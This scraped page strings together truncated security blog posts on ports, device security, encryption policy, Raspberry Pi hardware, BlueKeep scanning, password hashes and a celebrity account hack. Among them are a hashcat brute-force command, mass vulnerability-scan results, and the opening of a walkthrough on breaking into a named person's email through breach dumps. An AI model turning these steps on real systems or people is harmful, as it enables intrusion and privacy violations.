Errata Security - Errata Security Hacker Jeopardy, Wrong Answers Only Edition assignments of well-known ports, is 23.A good wrong answer is this one, port 25, where the Morris Worm spread via port 25 (SMTP) via the DEBUG command.pre-1988 it was 25, but you had to type DEBUG after connecting 😉- pukingmonkey🐒 (@pukingmonkey) August 10, 2019But the real correct response is port 21. The problem posed wasn't about which port was assigned to Telnet (port 23), but what you normally see these days.Port 21 is assigned to FTP, the file transfer protocol. A little known fact about FTP is that it uses Telnet for it's command-channel on port 21. In other words, FTP isn't a text-based protocol like SMTP, HTTP, POP3, and so on. Instead, it's layered on top of Telnet. It says right in RFC 959:When we look at the popular FTP implementations, we see that they do respond to Telnet control codes on port 21. There are a ton of FTP implementations, of course, so some don't respond to Telnet, and which treat it as a straight text protocol. But the vast majority of what's out there are implementations that do the Telnet as defined.Consider network intrusion detection systems. When they decode FTP, they do so with their Telnet protocol parsers. You can see this in the Snort source code, for example.The question is "normally seen". Well, Telnet on port 23 has largely been replaced by SSH on port 22, so you don't normally see it on port 23. However, FTP is still popular. While I don't have a hard study to point to, in my experience, the amount of traffic seen on port 21 is vastly higher than that seen on port 23. QED: the port where Telnet is normally seen is port 21.But the original problem wasn't so much "traffic" seen, but "available". That's a problem we can study with port scanners -- especially mass port scans of the entire Internet. Rapid7 has their yearly Internet Exposure Report. According to that report, port 21 is three times as available on the public Internet as port 23.]]> 2019-08-10T15:43:30+00:00 https://blog.erratasec.com/2019/08/hacker-jeopardy-wrong-answers-only.html www.secnews.physaphae.fr/article.php?IdArticle=1255474 False None None None Errata Security - Errata Security Securing devices for DEFCON phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case.These are the things I worry about:backup before you goupdate before you gocorrectly locking your devices with full disk encryptioncorrectly configuring WiFiBluetooth devicesMobile phone vs. StingraysUSBBackupTraveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat than whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want to even more the target gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this.Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.UpdateLike most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates.Backup before you update, but then, I already mentioned that above.Full disk encryptionThis is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it.You are at risk if you have a simple unlock code, like a predicable pattern or a 4-digit code. The longer and less predictable your unlock code, the more secure you are.I use iPhone's "face id" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable face id (by holding the buttons on both sides for 2 seconds).As for laptops, it's usually easy to enable full disk encryption. However there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third party full disk encryption products that use simple passwords.If you don't have a TPM, then hackers can brute-force crack your password, trying billions per second. This applies to my MacBook Air, which is the 2017 model before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password.I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to an account with a simpler account for going in/out of sleep mode. This second account can't be used to decrypt the drive.On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short.I ignore the "evil maid" threat, because my devices are always with me rather than in ]]> 2019-08-04T18:52:45+00:00 https://blog.erratasec.com/2019/08/securing-devices-for-defcon.html www.secnews.physaphae.fr/article.php?IdArticle=1242941 False Hack,Threat,Guideline None None Errata Security - Errata Security Why we fight for crypto William Barr called for crypto backdoors. His speech is a fair summary of law-enforcement's side of the argument. In this post, I'm going to address many of his arguments.The tl;dr version of this blog post is this:Their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.But we aren't talking about tradeoff with privacy, but other rights. In particular, it's every much as important to protect the rights of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to their "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.Thirdly, there is the problem of technical feasibility. We don't know how to make backdoors available for law enforcement access that doesn't enormously reduce security for users.BalanceThe crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the constitution by the Fourth Amendment. The 4rth doesn't express an absolute right to privacy, but allows for police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption is creating a "law free zone" enabling crime to be conducted without the ability of the police to investigate.It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil liberty concerns.However, this argument is wrong, as I'll discuss below.Law free zonesBarr claims encryption creates a new "law free zone ... giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before.Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit.The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room.Technology didn't create these zones. However, technological advances are allowing police to defeat them.Business's have security cameras everywhere. Neighborhood associations are installing license plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes listening to us. Our phones and computers have microphones and cameras. Our TV's increasingly have cameras and mics, too, in case we want to use them for video conferencing, or give them voice commands.Every argument Barr makes about crypto backdoors applies to backdoor access to microphones, every arguments applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These]]> 2019-07-28T15:21:32+00:00 https://blog.erratasec.com/2019/07/why-we-fight-for-crypto.html www.secnews.physaphae.fr/article.php?IdArticle=1229625 False Guideline None None Errata Security - Errata Security Censorship vs. the memes You can't yell fire in a crowded movie theaterThis phrase was first used in the Supreme Court decision Schenck v. United States to justify outlawing protests against the draft. Unless you also believe the government can jail you for protesting the draft, then the phrase is bankrupt of all meaning.In other words, how can it be used to justify the thing you are trying to censor and yet be an invalid justification for censoring those things (like draft protests) you don't want censored?What this phrase actually means is that because it's okay to suppress one type of speech, it justifies censoring any speech you want. Which means all censorship is valid. If that's what you believe, just come out and say "all censorship is valid".But this speech is harmful or invalidThat's what everyone says. In the history of censorship, nobody has ever wanted to censor good speech, only speech they claimed was objectively bad, invalid, unreasonable, malicious, or otherwise harmfulIt's just that everybody has different definitions of what, actually is bad, harmful, or invalid. It's like the movie theater quote. For example, China's constitution proclaims freedom of speech, yet the government blocks all mention of the Tienanmen Square massacre because it's harmful. It's "Great Firewall of China" is famous for blocking most of the content of the Internet that the government claims harms its citizens.I put some photos of the Tiananmen anniversary mass vigil in #Hongkong last night onto Wechat and my account has been suspended for “spreading malicious rumours”. The #China of today... pic.twitter.com/F6e2exsgGE- Stephen McDonell (@StephenMcDonell) June 5, 2019At least in case of movie theaters, the harm of shouting "fire" is immediate and direct. In all these other cases, the harm is many steps removed. Many want to censor anti-vaxxers, because their speech kills children. But the speech doesn't, the virus does. By extension, those not getting vaccinations may harm peopl]]> 2019-06-14T19:45:51+00:00 https://blog.erratasec.com/2019/06/censorship-vs-memes.html www.secnews.physaphae.fr/article.php?IdArticle=1155884 False None None None Errata Security - Errata Security Some Raspberry Pi compatible computers https://docs.google.com/spreadsheets/d/1jWMaK-26EEAKMhmp6SLhjScWW2WKH4eKD-93hjpmm_s/edit#gid=0Consider the Upboard, an x86 computer in the Raspberry Pi form factor for $99. When you include storage, power supplies, heatsinks, cases, and so on, it's actually pretty competitive. It's not ARM, so many things built for the Raspberry Pi won't necessarily work. But on the other hand, most of the software built for the Raspberry Pi was originally developed for x86 anyway, so sometimes it'll work better.Consider the quasi-RPi boards that support the same GPIO headers, but in a form factor that's not the same as a RPi. A good example would be the ODroid-N2. These aren't listed in the above spreadsheet, but there's a tone of them. There's only two Nano Pi's listed in the spreadsheet having the same form factor as the RPi, but there's around 20 different actual boards with all sorts of different form factors and capabilities.Consider the heatsink, which can make a big difference in the performance and stability of the board. You can put a small heatsink on any board, but you really need larger heatsinks and possibly fans. Some boards, like the ODroid-C2, come with a nice large heatsink. Other boards have a custom designed large heatsink you can purchase along with the board for around $10. The Raspberry Pi, of course, has numerous third party heatsinks available. Whether or not there's a nice large heatsink available is an important buying criteria. That spreadsheet should have a column for "Large Heatsink", whether one is "Integrated" or "Available".Consider power consumption and heat dissipation as a buying criteria. Uniquely among the competing devices, the Raspberry Pi itself uses a CPU fabbed on a 40nm process, whereas most of the competitors use 28nm or even 14nm. That means it consumes more power and produces more heat than any of it's competitors, by a large margin. The Intel Atom CPU mentioned above is actually one of the most power efficient, being fabbed on a 14nm process. Ideally, that spreadsheet would have tow additional columns for power consumption (and hence heat production) at "Idle" and "Load".You shouldn't really care about CPU speed. But if you are, there basically two classes of speed: in-order and out-of-order. For the same GHz, out-of-order CPUs are roughly twice as fast as in-order. The Cortex A5, A7, and A53 are in-order. The Cortex A17, A72, and A73 (and Intel Atom) are out-of-order. The spreadsheet also lists some NXP i.MX series processors, but those are actually ARM Cortex designs. I don't know which, though.The spreadsheet lists memory, like LPDDR3 or DDR4, but it's unclear as to speed. There's two things that determine speed, the number of MHz/GHz and the width, typically either 32-bits or 64-bits. By "64-bits" we can mean a single channel that's 64-bits wide, as in the case of the Intel Atom processors, or two channels that are each 32-bits wide, as in the case of some ARM processors. The Raspberry Pi has an incredibly anemic 32-bit 400-MHz memory, whereas some competitors have 64-bit 1600-MHz memory, or roughly 8 times the speed. For CPU-bound tasks, this isn't so important, but a lot of tasks are in fact bound by memory speed.As for GPUs, most are not OpenCL programmable, but some are. The VideoCore and Mali 4xx (Utgard) GPUs are not programmable. The Mali Txxx (Midgard) are programmable. The "MP2" suffix means two GPU processors, whereas "MP4" means four GPU processors. For a lot of tasks, such as "SDR" (software defined radio), offloading onto GPU simultaneously reduce]]> 2019-05-31T20:15:34+00:00 https://blog.erratasec.com/2019/05/some-raspberry-pi-compatible-computers.html www.secnews.physaphae.fr/article.php?IdArticle=1134738 False None None None Errata Security - Errata Security Your threat model is wrong PhishingAn example is this question that misunderstands the threat of "phishing":Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL- briankrebs (@briankrebs) May 29, 2019The (wrong) threat model is here is that phishing is an email that smart users with training can identify and avoid. This isn't true.Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator.- Tyler Pieron (@tyler_pieron) May 29, 2019Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as using two-factor authentication.IoT securityAfter the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.But auto-updates are a bigger threat than worms.Since Mirai, roughly 10-billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10-billion new IoT devices, it's still Windows and not IoT that is the main problem.The answer is that number, 10-billion. Internet worms work by guessing IPv4 addresses, of which there are only 4-billion. You can't have 10-billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10-billion devices are almost entirely being put on private ne]]> 2019-05-29T20:16:09+00:00 https://blog.erratasec.com/2019/05/your-threat-model-is-wrong.html www.secnews.physaphae.fr/article.php?IdArticle=1131777 False Ransomware,Tool,Vulnerability,Threat,Guideline NotPetya,FedEx None Errata Security - Errata Security Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.This returned 7,629,102 results (over 7-million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.The table of results is as follows:1447579  UNKNOWN - receive timeout1414793  SAFE - Target appears patched1294719  UNKNOWN - connection reset by peer1235448  SAFE - CredSSP/NLA required 923671  VULNERABLE -- got appid 651545  UNKNOWN - FIN received 438480  UNKNOWN - connect timeout 105721  UNKNOWN - connect failed 9  82836  SAFE - not RDP but HTTP  24833  UNKNOWN - connection reset on connect   3098  UNKNOWN - network error   2576  UNKNOWN - connection terminatedThe various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and respond weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, but for some reason return errors sometimes.The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.The next result are those marked SAFE due to probably being "pached". Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.The next result to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, but only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o]]> 2019-05-28T06:20:06+00:00 https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html www.secnews.physaphae.fr/article.php?IdArticle=1128860 False Ransomware,Vulnerability,Threat,Patching,Guideline NotPetya,Wannacry None Errata Security - Errata Security A lesson in journalism vs. cybersecurity blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many to support the conclusion the NSA is to be blamed, but only a single quote, from the NSA director, from the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find, it's that the story's authors didn't look.The main reason experts disagree is that the NSA's Eternalblue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with windows networking and stolen credentials. Yes, ransomware increasingly includes Eternalblue as part of their arsenal of attacks, but this doesn't mean Eternalblue is responsible for ransomware.The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph:That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue. Instead, the story is citing anonymous researchers claiming that EthernalBlue has been added to Emotet since after that DHS warning.Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism are that you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least, credible.And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out.In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use Eternalblue to spread. However, what ransomware is relying upon is still the Wind]]> 2019-05-27T19:59:38+00:00 https://blog.erratasec.com/2019/05/a-lesson-in-journalism-vs-cybersecurity.html www.secnews.physaphae.fr/article.php?IdArticle=1128277 False Ransomware,Malware,Patching,Guideline NotPetya,Wannacry None Errata Security - Errata Security Programming languages infosec professionals should learn Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Code from Microsoft. Also, whatever language you learn, stash your code at GitHub.Let's talk in general terms. Here are some types of languages.Unavoidable. As mentioned above, familiarity with JavaScript, bash/Powershell, and SQL are unavoidable. If you are avoiding them, you are doing something wrong.Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool using animal, this is your basic tool. You are a monkey, this is the stick you use to knock down the banana. Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising amount of "programming" tasks in those languages. Old timers use things like PERL or TCL. Sometimes the choice of which language to learn depends upon the vast libraries that come with the languages, especially Python and JavaScript libraries.Development languages.  Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task like C, C++, Java, C#, Rust, Go, or Swift.Domain-specific languages. The language Lua is built into nmap, snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or Matlab. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.As an experienced developer, here are my comments on the various languages, sorted in alphabetic order.bash (and other Unix shells)You have to learn some bash for dealing with the command-line. But it's also a fairly completely programming language. Perusing the scripts in an average Linux distribution, especially some of the older ones, and you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux.In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox which has "ash". I mention this because my bash skills are rather poor partly because I originally learned "csh" and get my syntax variants confused.As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things. In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, sod good bash language skills are a must.CThis is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i]]> 2019-04-23T00:18:02+00:00 https://blog.erratasec.com/2019/04/programming-languages-infosec.html www.secnews.physaphae.fr/article.php?IdArticle=1095315 False Guideline None None Errata Security - Errata Security Was it a Chinese spy or confused tourist? Politico has an article from a former spy analyzing whether the "spy" they caught at Mar-a-lago (Trump's Florida vacation spot) was actually a "spy". I thought I'd add to it from a technical perspective about her malware, USB drives, phones, cash, and so on.The part that has gotten the most press is that she had a USB drive with evil malware. We've belittled the Secret Service agents who infected themselves, and we've used this as the most important reason to suspect she was a spy.But it's nonsense.It could be something significant, but we can't know that based on the details that have been reported. What the Secret Service reported was that it "started installing software". That's a symptom of a USB device installing drivers, not malware. Common USB devices, such as WiFi adapters, Bluetooth adapters, microSD readers, and 2FA keys look identical to flash drives, and when inserted into a computer, cause Windows to install drivers.Visual "installing files" is not a symptom of malware. When malware does its job right, there are no symptoms. It installs invisibly in the background. Thats the entire point of malware, that you don't know it's there. It's not to say there would be no visible evidence. A popular way of hacking desktops with USB drives is by emulating a keyboard/mouse that quickly types commands, which will cause some visual artifacts on the screen. It's just that "installing files" does not lend itself to malware as being the most likely explanation.That it was "malware" instead of something normal is just the standard trope that anything unexplained is proof of hackers/viruses. We have no evidence it was actually malware, and the evidence we do have suggests something other than malware.Lots of travelers carry wads of cash. I carry ten $100 bills with me, hidden in my luggage, for emergencies. I've been caught before when the credit card company fraud detection triggers in a foreign country leaving me with nothing. It's very distressing, hence cash.The Politico story mentioned the "spy" also has a U.S. bank account, and thus cash wasn't needed. Well, I carry that cash, too, for domestic travel. It's just not for international travel. In any case, the U.S. may have been just one stop on a multi-country itinerary. I've taken several "round the world" trips where I've just flown one direction, such as east, before getting back home. $8k is in the range of cash that such travelers carry.The same is true of phones and SIMs. Different countries have different frequencies and technologies. In the past, I've traveled with as many as three phones (US, Japan, Europe). It's gotten better with modern 4G phones, where my iPhone Xs should work everywhere. (Though it's likely going to diverge again with 5G, as the U.S. goes on a different path from the rest of the world.)The same is true with SIMs. In the past, you pretty much needed a different SIM for each country. Arrival in the airport meant going to the kiosk to get a SIM for $10. At the end of a long itinerary, I'd arrive home with several SIMs. These days, however, with so many "MVNOs", such as Google Fi, this is radically less necessary. However, the fact that the latest high-end phones all support dual-SIMs proves it's still an issue.Thus, the evidence so far is that of a normal traveler. If these SIMs/phones are indeed because of spying, we would need additional evidence. A quick analysis of the accounts associated with the SIMs and the of the contents of the phones should tells us if she's a traveler or spy.Normal travelers may be concerned about hidden cameras. There's this story from about Korean hotels filming guests, and this other one about ]]> 2019-04-21T17:16:36+00:00 https://blog.erratasec.com/2019/04/was-it-chinese-spy-or-confused-tourist.html www.secnews.physaphae.fr/article.php?IdArticle=1095316 False Malware None None Errata Security - Errata Security Assange indicted for breaking a password According to the US DoJ's press release:Julian P. Assange, 47, the founder of WikiLeaks, was arrested today in the United Kingdom pursuant to the U.S./UK Extradition Treaty, in connection with a federal charge of conspiracy to commit computer intrusion for agreeing to break a password to a classified U.S. government computer.The full indictment is here.It seems the indictment is based on already public information that came out during Manning's trial, namely this log of chats between Assange and Manning, specifically this section where Assange appears to agree to break a password:What this says is that Manning hacked a DoD computer and found the hash "80c11049faebf441d524fb3c4cd5351c" and asked Assange to crack it. Assange appears to agree.So what is a "hash", what can Assange do with it, and how did Manning grab it?Computers store passwords in an encrypted (sic) form called a "one way hash". Since it's "one way", it can never be decrypted. However, each time you log into a computer, it again performs the one way hash on what you typed in, and compares it with the stored version to see if they match. Thus, a computer can verify you've entered the right password, without knowing the password itself, or storing it in a form hackers can easily grab. Hackers can only steal the encrypted form, the hash.When they get the hash, while it can't be decrypted, hackers can keep guessing passwords, performing the one way algorithm on them, and see if they match. With an average desktop computer, they can test a billion guesses per second. This may seem like a lot, but if you've chosen a sufficiently long and complex password (more than 12 characters with letters, numbers, and punctuation), then hackers can't guess them.It's unclear what format this password is in, whether "NT" or "NTLM". Using my notebook computer, I could attempt to crack the NT format using the hashcat password crack with the following command:hashcat -m 3000 -a 3 80c11049faebf441d524fb3c4cd5351c ?a?a?a?a?a?a?aAs this image shows, it'll take about 22 hours on my laptop to crack this. However, this doesn't succeed, so it seems that this isn't in the NT format. Unlike other password formats, the "NT" format can only be 7 characters in length, so we can completely crack it.]]> 2019-04-11T20:22:14+00:00 https://blog.erratasec.com/2019/04/assange-indicted-for-breaking-password.html www.secnews.physaphae.fr/article.php?IdArticle=1093008 False Hack None None Errata Security - Errata Security Some notes on the Raspberry Pi this article in my timeline today about the Raspberry Pi. I thought I'd write up some notes about it.The Raspberry Pi costs $35 for the board, but to achieve a fully functional system, you'll need to add a power supply, storage, and heatsink, which ends up costing around $70 for the full system. At that price range, there are lots of alternatives. For example, you can get a fully function $99 Windows x86 PC, that's just as small and consumes less electrical power.There are a ton of Raspberry Pi competitors, often cheaper with better hardware, such as a Odroid-C2, Rock64, Nano Pi, Orange Pi, and so on. There are also a bunch of "Android TV boxes" running roughly the same hardware for cheaper prices, that you can wipe and reinstall Linux on. You can also acquire Android phones for $40.However, while "better" technically, the alternatives all suffer from the fact that the Raspberry Pi is better supported -- vastly better supported. The ecosystem of ARM products focuses on getting Android to work, and does poorly at getting generic Linux working. The Raspberry Pi has the worst, most out-of-date hardware, of any of its competitors, but I'm not sure I can wholly recommend any competitor, as they simply don't have the level of support the Raspberry Pi does.The defining feature of the Raspberry Pi isn't that it's a small/cheap computer, but that it's a computer with a bunch of GPIO pins. When you look at the board, it doesn't just have the recognizable HDMI, Ethernet, and USB connectors, but also has 40 raw pins strung out across the top of the board. There's also a couple extra connectors for cameras.The concept wasn't simply that of a generic computer, but a maker device, for robot servos, temperature and weather measurements, cameras for a telescope, controlling christmas light displays, and so on.I think this is underemphasized in the above story. The reason it finds use in the factories is because they have the same sorts of needs for controlling things that maker kids do. A lot of industrial needs can be satisfied by a teenager buying $50 of hardware off Adafruit and writing a few Python scripts.On the other hand, support for industrial uses is nearly nonexistant. The reason commercial products cost $1000 is because somebody will answer your phone, unlike the teenager whose currently out at the movies with their friends. However, with more and more people having experience with the Raspberry Pi, presumably you'll be able to hire generic consultants soon that can maintain th]]> 2019-03-12T18:43:41+00:00 https://blog.erratasec.com/2019/03/some-notes-on-raspberry-pi.html www.secnews.physaphae.fr/article.php?IdArticle=1066677 False Hack None None Errata Security - Errata Security A quick lesson in confirmation bias For example, take that "Trump-AlfaBank" theory. One of the oddities noted by researchers is lookups for "trump-email.com.moscow.alfaintra.net". One of the conspiracy theorists explains has proof of human error, somebody "fat fingered" the wrong name when typing it in, thus proving humans were involved in trying to communicate between the two entities, as opposed to simple automated systems.But that's because this "expert" doesn't know how DNS works. Your computer is configured to automatically put local suffices on the end of names, so that you only have to lookup "2ndfloorprinter" instead of a full name like "2ndfloorprinter.engineering.example.com".When looking up a DNS name, your computer may try to lookup the name both with and without the suffix. Thus, sometimes your computer looks up "www.google.com.engineering.exmaple.com" when it wants simply "www.google.com".Apparently, Alfabank configures its Moscow computers to have a suffix "moscow.alfaintra.net". That means any DNS name that gets resolved will sometimes get this appended, so we'll sometimes see "www.google.com.moscow.alfaintra.net".Since we already know there were lookups from that organization for "trump-email.com", the fact that we also see "trump-email.com.moscow.alfaintra.net" tells us nothing new.In other words, the conspiracy theorists didn't understand it, so came up with their own explanation, and this confirmed their biases. In fact, there is a simpler explanation that neither confirms nor refutes anything.The reason for the DNS lookups for "trump-email.com" are still unexplained. Maybe they are because of something nefarious. The Trump organizations had all sorts of questionable relationships with Russian banks, so such a relationship wouldn't be surprising. But here's the thing: just because we can't come up with a simpler explanation doesn't make them proof of a Trump-Alfabank conspiracy. Until we know why those lookups where generated, they are an "unknown" and not "evidence".The reason I write this post is because of this story about a student expelled due to "grade hacking". It sounds like this sort of situation, where the IT department saw anomalies it couldn't explain, so the anomalies became proof of the theory they'd created to explain them.Unexplained phenomena are unexplained. They are not evidence confirming your theory that explains them.]]> 2019-03-09T15:39:51+00:00 https://blog.erratasec.com/2019/03/a-quick-lesson-in-confirmation-bias.html www.secnews.physaphae.fr/article.php?IdArticle=1062312 False None None None Errata Security - Errata Security A basic question about TCP Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56-kilobits-per-secondl using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line consisting of 1.544-mbps was an important standard back in the day.In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established."Congestion" is important. Keep that in mind. We'll get to it a bit further down.The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, that it needs to reserve resources to it.This was actually the original design of the the OSI Network Layer.Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious.To do this, the "Open Systems Interconnect" or "OSI" group was established under the auspices of the ISO, the international standards organization.The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all the information is stripped out of the packets before they are forwarded to across the Internet.Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information is likewise is stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP will be layer 4, the "Transport Layer".The original idea for the network layer was that it would be connection oriented, modeled after the phone system. The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.Layer 3 also included]]> 2019-02-25T18:20:47+00:00 https://blog.erratasec.com/2019/02/a-basic-question-about-tcp.html www.secnews.physaphae.fr/article.php?IdArticle=1041758 False None None None Errata Security - Errata Security How Bezo\'s dick pics might\'ve been exposed government agents or the "deep state" were involved in this sordid mess. The more likely explanation is that it was a simple hack. Teenage hackers regularly do such hacks -- they aren't hard.This post is a description of how such hacks might've been done.To start with, from which end were they stolen? As a billionaire, I'm guessing Bezos himself has pretty good security, so I'm going to assume it was the recipient, his girlfriend, who was hacked.The hack starts by finding the email address she uses. People use the same email address for both public and private purposes. There are lots of "people finder" services on the Internet that you can use to track this information down. These services are partly scams, using "dark patterns" to get you to spend tons of money on them without realizing it, so be careful.Using one of these sites, I quickly found a couple of a email accounts she's used, one at HotMail, another at GMail. I've blocked out her address. I want to describe how easy the process is, I'm not trying to doxx her.Next, I enter those email addresses into the website http://haveibeenpwned.com to see if hackers have ever stolen her account password. When hackers break into websites, they steal the account passwords, and then exchange them on the dark web with other hackers. The above website tracks this, helping you discover if one of your accounts has been so compromised. You should take this opportunity to enter your email address in this site to see if it's been so "pwned".I find that her email addresses have been included in that recent dump of 770 million accounts called "Collection#1".The 